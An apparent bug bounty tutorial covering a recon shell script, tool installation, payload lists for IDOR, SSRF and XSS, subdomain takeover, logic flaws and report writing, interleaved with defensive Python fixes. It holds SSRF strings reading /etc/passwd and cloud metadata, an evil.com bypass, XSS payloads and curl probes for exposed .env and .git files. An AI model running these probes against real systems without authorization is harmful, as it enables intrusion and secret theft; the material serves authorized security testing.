Bug Bounty Tips & Tricks

Proven strategies and techniques for successful bug bounty hunting. Master reconnaissance automation, identify high-impact vulnerabilities, and write compelling reports that maximize your earnings and impact.

Recon Automation & Toolkit

Complete Recon Pipeline

#!/bin/bash
# Automated bug bounty recon script
# Usage: ./recon.sh target.com
set -u

TARGET="${1:-}"
if [ -z "$TARGET" ]; then
    echo "Usage: $0 target.com" >&2
    exit 1
fi

# Fail early if any stage's tool is missing instead of producing empty files
for tool in subfinder assetfinder aquatone naabu httpx ffuf; do
    command -v "$tool" >/dev/null 2>&1 || { echo "[-] Missing tool: $tool" >&2; exit 1; }
done

OUTPUT_DIR="${TARGET}_recon_$(date +%s)"
mkdir -p "$OUTPUT_DIR"

echo "[*] Starting recon on $TARGET"

# Step 1: Subdomain enumeration (merge both sources, then de-duplicate)
echo "[*] Enumerating subdomains..."
subfinder -d "$TARGET" -o "$OUTPUT_DIR/subdomains.txt" 2>/dev/null
assetfinder --subs-only "$TARGET" >> "$OUTPUT_DIR/subdomains.txt" 2>/dev/null
sort -u "$OUTPUT_DIR/subdomains.txt" > "$OUTPUT_DIR/subdomains_final.txt"

# Step 2: Screenshot each subdomain
echo "[*] Taking screenshots..."
aquatone -out "$OUTPUT_DIR/aquatone" < "$OUTPUT_DIR/subdomains_final.txt"

# Step 3: Port scanning (rate-limited; keep within the program's rules)
echo "[*] Port scanning..."
naabu -list "$OUTPUT_DIR/subdomains_final.txt" -rate 150 -output "$OUTPUT_DIR/ports.txt"

# Step 4: Service discovery (naabu emits host:port lines, which httpx accepts)
echo "[*] Probing services..."
httpx -list "$OUTPUT_DIR/ports.txt" -o "$OUTPUT_DIR/alive.txt"

# Step 5: Directory brute force on live hosts
echo "[*] Fuzzing directories..."
while read -r url; do
    host="${url#*://}"      # strip the scheme
    host="${host%%/*}"      # keep host[:port] for the output filename
    ffuf -u "$url/FUZZ" -w /usr/share/wordlists/dirb/common.txt \
         -o "$OUTPUT_DIR/${host}.json" </dev/null
done < "$OUTPUT_DIR/alive.txt"

echo "[+] Recon complete! Results in: $OUTPUT_DIR"

Key Tools Setup

# Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/ffuf/ffuf@latest

# Install with apt
sudo apt install -y burpsuite zaproxy sqlmap nikto

# Screenshot tools
# aquatone ships as a prebuilt binary, not an npm package: download the release
# archive from https://github.com/michenriksen/aquatone/releases and put the
# aquatone binary on your PATH

# Domain/subdomain tools (dnsrecon is on PyPI; dnsenum is a Perl script packaged by apt)
pip3 install dnsrecon
sudo apt install -y dnsenum

High-Impact Vulnerabilities

IDOR (Insecure Direct Object Reference)

# Discovery technique
# 1. Find endpoints with user-specific data
/api/profile/123
/api/orders/456
/documents/789

# 2. Test with different IDs
# Change ID to sequential number
/api/profile/124
/api/profile/125

# 3. Try ID manipulation
/api/profile/124%00
/api/profile/124.json
/api/profile/124/
/api/profile/124%2e%2e%2f

# Advanced IDOR
# UUID-based endpoints
# Change single character: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
# Test with known UUIDs

# Hash-based endpoints
# Weak hashing: MD5(id)
# md5 -s "123" = 202cb962ac59075b964b07152d234b70

SSRF (Server-Side Request Forgery)

# Discovery
/api/fetch?url=http://example.com
/api/download?url=
/api/preview?src=
/proxy?url=

# Exploitation
# Local file access
?url=file:///etc/passwd
?url=file:///var/www/html/config.php

# Internal services
?url=http://localhost:8080/admin
?url=http://127.0.0.1:8080
?url=http://192.168.1.1/
?url=http://169.254.169.254/latest/meta-data/  # AWS

# URL encoding bypass
?url=http://127%2e0%2e0%2e1
?url=http://localhost//admin
?url=http://localhost:@evil.com@localhost/

# DNS rebinding
# Create attacker domain pointing to localhost
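The server-side check that closes the fetch/preview/proxy endpoints listed above, as an added example that is not part of the original page: it rejects non-HTTP schemes, decodes the percent-encoded host, ignores the userinfo decoy in `localhost:@evil.com@localhost/`, and refuses any address that resolves to loopback, private, link-local (including the 169.254.169.254 metadata service) or IPv4-mapped ranges. `resolve_all` and `check_fetch_url` are names chosen here; the resolver is injectable so the check runs offline.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # file://, gopher://, etc. are rejected outright

def resolve_all(host):
    """Resolve a hostname to every address it maps to (A and AAAA)."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []

def is_public_address(addr):
    """True only for globally routable unicast addresses."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)

def check_fetch_url(url, resolver=resolve_all):
    """Return (True, host) if the URL may be fetched server-side, else (False, reason).
    `resolver` is injectable so the check can be exercised without network access."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    # urlsplit drops userinfo, so http://localhost:@evil.com@localhost/ yields
    # hostname 'localhost'; the decoy 'evil.com' never reaches the check.
    host = parts.hostname
    if not host:
        return False, "missing host"
    # Undo percent-encoding so 127%2e0%2e0%2e1 is judged as 127.0.0.1.
    host = unquote(host).lower().rstrip(".")
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP, no lookup needed
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"{addr} is not a public address"
    return True, host
```

Connect to the address this check resolved (or re-run the check inside the HTTP client's connection hook) rather than letting the client resolve the name a second time; that second lookup is exactly the window DNS rebinding exploits.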

XSS (Cross-Site Scripting)

# Common injection points
# Search: /search?q=<script>alert('xss')</script>
# Comments: /post/123#comment=<img src=x onerror="alert('xss')">
# Usernames: /profile?name=<svg onload="alert('xss')">

# Payloads
<script>alert('XSS')</script>
<img src=x onerror="alert('XSS')">
<svg onload="alert('XSS')">
<iframe src="javascript:alert('XSS')">
<body onload="alert('XSS')">
<input onfocus="alert('XSS')" autofocus>

# Context-aware payloads
# In HTML: <script>alert(1)</script>
# In JavaScript string: '</script><script>alert(1)</script>
# In attribute: " onclick="alert(1)

# Advanced XSS
# Unicode/UTF-8 bypasses
\u003cscript\u003ealert('XSS')\u003c/script\u003e
# HTML encoding
&#60;script&#62;alert('XSS')&#60;/script&#62;
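Why the three context-aware payloads above need three different encoders, shown as an added example (not from the original page): the same untrusted value is rendered into a text node, a quoted attribute and an inline-script string. The JavaScript case is the one that bites: `json.dumps` escapes quotes but not `<`, so `'</script><script>alert(1)</script>` would still end the script element. The function and template names are chosen here.

```python
import html
import json

def encode_for_html_body(value):
    """Text-node context, e.g. <h1>Results for {value}</h1>."""
    return html.escape(value, quote=False)

def encode_for_html_attribute(value):
    """Quoted-attribute context, e.g. <input value="{value}">. Escaping the quote
    stops '" onclick="alert(1)' from closing the attribute and adding a handler."""
    return html.escape(value, quote=True)

def encode_for_js_string(value):
    """Inline-script string context, e.g. var q = {value};
    json.dumps escapes quotes and backslashes but leaves '<' alone, so
    '</script><script>alert(1)</script> would still terminate the <script>
    element (the HTML parser runs before the JavaScript parser sees the string).
    HTML-significant characters are therefore emitted as \\uXXXX escapes, which
    the HTML parser ignores and the JS engine decodes back to the same string."""
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        encoded = encoded.replace(ch, esc)
    return encoded

def render_search_page(query):
    """Constructed template placing one untrusted value in all three contexts."""
    return (
        f"<h1>Results for {encode_for_html_body(query)}</h1>\n"
        f'<input name="q" value="{encode_for_html_attribute(query)}">\n'
        f"<script>var q = {encode_for_js_string(query)};</script>"
    )
```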

Subdomain Takeover

# Discovery
# Find subdomains pointing to services no longer in use
# Check CNAME records

# Identify vulnerable services
# Check if CNAME points to:
# - Heroku
# - GitHub Pages
# - Shopify
# - AWS CloudFront
# - etc.

# Verification
dig subdomain.target.com CNAME
nslookup subdomain.target.com

# Tools
subzy run --targets subdomains.txt
subjack -w /path/to/subdomains.txt -t 100

# Common vulnerable CNAMEs
# *.herokuapp.com - verify ownership
# *.github.io - create repo with same name
# *.shopify.com - claim shop
# cloudfront - create distribution

Vulnerability Chaining & Logic Bugs

Authentication Bypass

# Password reset flaws
# - Weak token generation
# - Token reuse
# - Expired tokens still valid
# - Email-based with predictable patterns

# 2FA/MFA bypass
# - SMS interception
# - Backup code misuse
# - Race condition in validation
# - Null/empty bypass

# Session issues
# - Session fixation
# - Weak session tokens
# - Cookie theft
# - Concurrent session abuse
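A reset-token store that avoids the first three password-reset flaws listed above (weak generation, reuse, expired tokens still accepted), as an added example that is not part of the original page. `ResetTokenStore` and its in-memory dict are constructed for illustration; `now` is a parameter only so expiry can be exercised deterministically.

```python
import hashlib
import secrets
import time

class ResetTokenStore:
    """In-memory password-reset token store (constructed example; a real
    deployment would back this with a database)."""
    TTL_SECONDS = 15 * 60

    def __init__(self):
        self._by_hash = {}   # sha256(token) -> (user_id, expires_at)

    @staticmethod
    def _digest(token):
        # Only the hash is stored, so a leaked table does not yield usable tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id, now=None):
        now = time.time() if now is None else now
        # Issuing a new token revokes any outstanding one for the same user,
        # so an older emailed link cannot be replayed after a fresh request.
        self._by_hash = {h: v for h, v in self._by_hash.items() if v[0] != user_id}
        # 256 bits from the OS CSPRNG: not derived from time, user ID or a counter.
        token = secrets.token_urlsafe(32)
        self._by_hash[self._digest(token)] = (user_id, now + self.TTL_SECONDS)
        return token

    def redeem(self, token, now=None):
        """Return the user_id if the token is valid, else None. A token is
        single-use: it is removed whether it was consumed or found expired."""
        now = time.time() if now is None else now
        entry = self._by_hash.pop(self._digest(token), None)
        if entry is None:
            return None
        user_id, expires_at = entry
        if now > expires_at:
            return None
        return user_id
```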

Business Logic Flaws

# Price manipulation
# Modify price in request/response
# Discount stacking
# Negative amount exploitation

# Race conditions
# Buy same limited item twice
# Process payment twice
# Exploit timing windows

# Workflow bypass
# Skip steps in multi-step process
# Reorder workflow steps
# Access unauthorized stages

# Example: E-commerce checkout
# 1. Add item to cart
# 2. Apply discount (100% off)
# 3. Complete purchase
# Test: Apply discount twice, negative quantity, etc.

Information Disclosure

# Source code leakage
# .git exposed
# .env files accessible
# Backup files (.bak, .old, .zip)

# API endpoint discovery
# /api/v1/* usually has more endpoints than v2
# Check swagger/openapi endpoints
# /api/*/docs, /api/*/schema

# Sensitive data in responses
# User IDs, internal IDs
# Error messages revealing structure
# Timing attacks (username enumeration)

# Detection
curl -s https://target.com/.git/config
curl -s https://target.com/.env
# Probe likely backup names next to a known file (a local `find` only works on a mirrored copy)
for ext in bak old zip; do
    curl -s -o /dev/null -w "%{http_code} /index.php.$ext\n" "https://target.com/index.php.$ext"
done

Effective Report Writing

Report Template Structure

# Bug Report: [Vulnerability Type]

## Summary
Brief description of the vulnerability and its impact

## Vulnerability Details
- Type: IDOR, SSRF, XSS, etc.
- Severity: Critical/High/Medium/Low
- CVSS Score: 8.5
- CWE: CWE-639 (Authorization Bypass)

## Description
Detailed explanation of the vulnerability:
- What the vulnerability is
- How it was discovered
- Why it's a vulnerability
- Technical details

## Proof of Concept
Step-by-step instructions to reproduce:
1. Login as user A
2. Navigate to /api/profile/123
3. Change ID to 124
4. Request is successful (should be denied)

Include:
- HTTP requests/responses
- Screenshots
- Videos (for complex vulnerabilities)
- Code snippets

## Impact Assessment
- **Confidentiality**: User data exposure
- **Integrity**: Unauthorized modifications
- **Availability**: Service disruption
- Business impact: "Attackers can access other users' sensitive documents"

## Affected Endpoints
- GET /api/profile/{id}
- GET /api/documents/{id}
- PUT /api/user/{id}/settings

## Remediation
Detailed fix recommendations:
1. Validate user has access to requested resource
2. Implement proper authorization checks
3. Use UUID instead of sequential IDs
4. Add access control lists

## Severity Justification
Why this is High/Critical:
- Easy to exploit
- No user interaction required
- Affects all users
- Sensitive data at risk

## Timeline
- Reported: 2025-03-15
- Acknowledged: 2025-03-16
- Fixed: 2025-03-20
- Verified: 2025-03-21

Report Writing Tips

# DO's
- Be clear and concise
- Include proof of concept
- Show business impact
- Provide actionable remediation
- Include severity justification
- Use professional language

# DON'Ts
- Be vague or unclear
- Include irrelevant information
- Make it overly technical
- Demand specific bounty amount
- Be threatening or demanding
- Submit before verifying the vulnerability

# Format tips
- Use markdown for clarity
- Include screenshots with annotations
- Provide video walkthrough for complex bugs
- Use proper spelling/grammar
- Organize logically
- Keep sensitive data out of examples

Staying Ahead of Competition

Program Selection Strategy

# Choose programs wisely
# High-paying programs
- Facebook: $500-$40,000+
- Google: $300-$15,600
- Microsoft: $500-$20,000
- Apple: $50-$200,000

# Less crowded programs
- Niche/vertical-specific companies
- Local/regional companies
- Newer programs with less competition
- Check hackerone.com for bounty statistics

# Program maturity indicators
- Time on platform
- Average bounty amount
- Response time
- Previous vulnerabilities
- Number of researchers

Efficiency Maximization

# Spend more time on reconnaissance
# 80/20 rule: 80% recon, 20% exploitation
# Most bugs are found in recon phase

# Focus on automation
# Create reusable scripts
# Batch process multiple targets
# Parallelize scanning

# Maintain notes/database
# Track which targets you've tested
# Note findings for each target
# Identify patterns

# Learn from writeups
# Read published bug reports
# Understand common patterns
# Study remediation techniques

# Time management
# Dedicate specific time to research
# Balance depth vs breadth
# Track ROI per target
# Know when to move on

Long-term Success

# Build reputation
# Document your findings
- Write detailed reports
- Include proof of concept videos
- Provide clear remediation guidance

# Engage with programs
- Communicate professionally
- Follow responsible disclosure
- Ask clarifying questions
- Provide updates during fix

# Diversify targets
- Don't rely on one program
- Balance easy wins with harder targets
- Try different vulnerability types
- Experiment with new techniques

# Continuous learning
- Stay updated on new vulnerabilities
- Learn new tools and techniques
- Study attacker methodologies
- Follow security conferences/blogs

Common Mistakes to Avoid

Reporting Mistakes

# ❌ Don't:
- Submit without verifying vulnerability
- Include sensitive data in reports
- Demand specific bounty amount
- Be disrespectful or threatening
- Report duplicate vulnerabilities
- Ignore scope limitations

# ✓ Do:
- Verify the vulnerability is real
- Redact sensitive information
- Provide clear proof of concept
- Be professional and courteous
- Check if already reported
- Follow program scope exactly

Discovery Mistakes

# ❌ Over-focusing on one target
# Solution: Diversify across programs

# ❌ Neglecting automation
# Solution: Build scripts for repetitive tasks

# ❌ Only testing obvious endpoints
# Solution: Deep dive into all functionality

# ❌ Giving up too quickly
# Solution: Spend sufficient time on each target

# ❌ Not reading past reports
# Solution: Study disclosed vulnerabilities

Technical Mistakes

# ❌ Not understanding the context
# Solution: Map entire application flow

# ❌ Testing in production directly
# Solution: Use staging/test environments

# ❌ Invalid proof of concept
# Solution: Ensure steps are reproducible

# ❌ Incomplete testing
# Solution: Test multiple scenarios/inputs

# ❌ Causing damage
# Solution: Be extra careful, never destroy data

Advanced Techniques

API Testing

# Find API endpoints
# Look for:
# - /api/
# - /v1/, /v2/
# - /rest/
# - GraphQL endpoints: /graphql

# Enumerate API
# Test GET, POST, PUT, DELETE, PATCH

# Test authentication
curl -H "Authorization: Bearer invalid_token" https://target.com/api/data

# Test with different API versions
# /api/v1/ might have fewer security checks

# API key discovery
# Check requests for patterns
# Headers: X-API-Key, Authorization
# Query params: ?api_key=
# Cookies

# Rate limiting bypass
# Rotate IP addresses
# Use sleep between requests
# Distribute across proxies

Parameter Pollution & Manipulation

# HTTP Parameter Pollution (HPP)
# Submit same parameter twice with different values
# ?id=1&id=2

# Server-side filter bypass
# ?filter[]=admin&filter[]=<script>

# Type juggling (PHP)
# "0" == "0e0" is true: loose comparison treats both as numeric 0
# A hash or token check written with == can be bypassed this way; === compares strictly

# Array parameters (type confusion)
# ?id[]=1 (PHP parses this as an array instead of a string; validation written for strings may error or be skipped)

# Null byte injection (older systems)
# ?file=config.php%00.jpg

# Case sensitivity bypass
# /Admin vs /admin
# /Upload.php vs /upload.PHP

Advanced Recon Tricks

# Wayback machine
# https://archive.org/web/
# Find old endpoints, outdated tech

# Certificate transparency logs
# Find subdomains from SSL certificates
# https://crt.sh/?q=target.com

# GitHub dorks
# site:github.com "target.com" password
# site:github.com "target.com" api_key

# Google dorking
# site:target.com filetype:pdf
# site:target.com inurl:admin
# site:target.com intext:password

# Shodan
# http.status:200 org:"Target Inc"
# Find all exposed services

# DNS data mining
# Reverse DNS lookups
# MX records can reveal infrastructure
# SPF/DKIM records

Bug Bounty Programs & Platforms

Major Programs

# HackerOne
# https://hackerone.com
# Average bounty: $300-$5,000
# Top programs: Dropbox, GitHub, Yahoo, Slack

# Bugcrowd
# https://bugcrowd.com
# Average bounty: $200-$3,000
# Top programs: Yahoo, Microsoft, Google

# Intigriti
# https://intigriti.com
# European-focused
# Average bounty: €200-€3,000

# YesWeHack
# https://yeswehack.com
# European platform
# Strong in France, Germany

# Synack
# https://synack.com
# Invitation-only
# Structured testing programs

# Program comparison
# Size of community
# Bounty ranges
# Average payout time
# Response time
# Type of vulnerabilities

Pro Tips for Program Selection

# Green programs (new to platform)
- Less competition
- Programs eager for feedback
- Often faster response times

# Programs with higher bounties
- Check disclosed reports
- Research company size/sector
- Tech companies generally pay more
- Finance/healthcare competitive

# Look for:
- Quick response times
- Professional communication
- Reasonable scope
- Clear guidelines
- History of paying
- Active community

Professional Development

Build Your Brand

# Start a blog
- Document your findings
- Share vulnerability analysis
- Publish write-ups
- Attracts attention from programs

# Twitter/Social Media
- Share tips and tricks
- Engage with security community
- Showcase findings (after disclosure)
- Network with other researchers

# GitHub
- Publish tools and scripts
- Share automation scripts
- Document methodologies
- Build portfolio

# Speaking & Teaching
- Security conferences
- Webinars
- Training courses
- Community talks

Income Streams

# Bug Bounties
- Primary income for many

# Consulting
- Sell services to companies
- Penetration testing
- Security assessments

# Training
- Udemy/Coursera courses
- Bootcamp instruction
- Workshop facilitation

# Tools & Services
- Security tools
- SaaS services
- Automation platforms

# Content
- YouTube channel
- Blog sponsorships
- Technical writing

Real-World Example: Finding IDOR

Scenario

Target: E-commerce application

Steps

# 1. Reconnaissance
# Identify API endpoints
# Look for user-specific data: /api/orders, /api/profile, /api/invoices

# 2. Request Analysis
curl -H "Authorization: Bearer token" https://target.com/api/orders/12345
# Response includes order details for user A

# 3. Test IDOR
curl -H "Authorization: Bearer token" https://target.com/api/orders/12346
# Should fail for user A but doesn't - IDOR found!

# 4. Verify Impact
# Access multiple other users' orders
# Document findings
# Test different API versions (/v2, /v3)

# 5. Proof of Concept
# Write reproducible steps:
# 1. Login as User A
# 2. Get token
# 3. Request /api/orders/123 (accessible)
# 4. Request /api/orders/124 (should be denied, but accessible)
# 5. Request /api/orders/9999 (random user ID - accessible)

# 6. Report
# Severity: High (access to all user data)
# Impact: Potential breach of PII
# Fix: Verify user owns resource before returning data
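The ownership check that the IDOR section's remediation and this scenario's fix line ask for, as an added example that is not part of the original page: a vulnerable handler beside the fixed one, plus a probe that replays the proof-of-concept steps (own ID, a neighbour, a random ID) and returns which IDs were served, which a developer can keep as a regression test. `ORDERS`, the user names and the function names are constructed for illustration.

```python
# Constructed data: orders keyed by sequential ID, each with an owner.
ORDERS = {
    12345: {"owner": "userA", "total": 49.99},
    12346: {"owner": "userB", "total": 120.00},
    9999:  {"owner": "userC", "total": 8.50},
}

class NotFound(Exception):
    pass

def get_order_vulnerable(current_user, order_id):
    """Looks the record up by ID alone: any authenticated user who changes the
    number in the URL reads someone else's order (the IDOR from the scenario)."""
    if order_id not in ORDERS:
        raise NotFound
    return ORDERS[order_id]

def get_order_fixed(current_user, order_id):
    """Scopes the lookup to the caller. 'Missing' and 'not yours' both raise the
    same NotFound so the response does not confirm which IDs exist.
    Switching to UUIDs (the report's remediation step 3) only slows enumeration;
    this ownership check is what actually closes the bug."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != current_user:
        raise NotFound
    return order

def probe(handler, user, ids):
    """Replays the PoC steps as one user and returns the IDs that were served.
    For the fixed handler this must contain only the caller's own orders."""
    accessible = []
    for order_id in ids:
        try:
            handler(user, order_id)
            accessible.append(order_id)
        except NotFound:
            pass
    return accessible
```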

Expected Bounty

  • Severity: High
  • Impact: Moderate to High
  • Typical Range: $500-$3,000
  • Depends on program and sensitivity of data

Key Principles

Responsible Disclosure

  • Never exploit vulnerabilities beyond proof of concept
  • Don’t damage systems or data
  • Don’t access more data than necessary
  • Respect confidentiality
  • Follow program guidelines
  • Disclose timeframes

Communication

  • Be professional and respectful
  • Ask clarifying questions
  • Respond promptly to program questions
  • Follow up on progress
  • Accept feedback gracefully
  • Maintain confidentiality

Continuous Improvement

  • Track your findings
  • Analyze patterns
  • Measure ROI per target
  • Refine your techniques
  • Learn from failures
  • Share knowledge (responsibly)

Resources

Learning Platforms

Communities

Tools


Last updated: 2025-03-30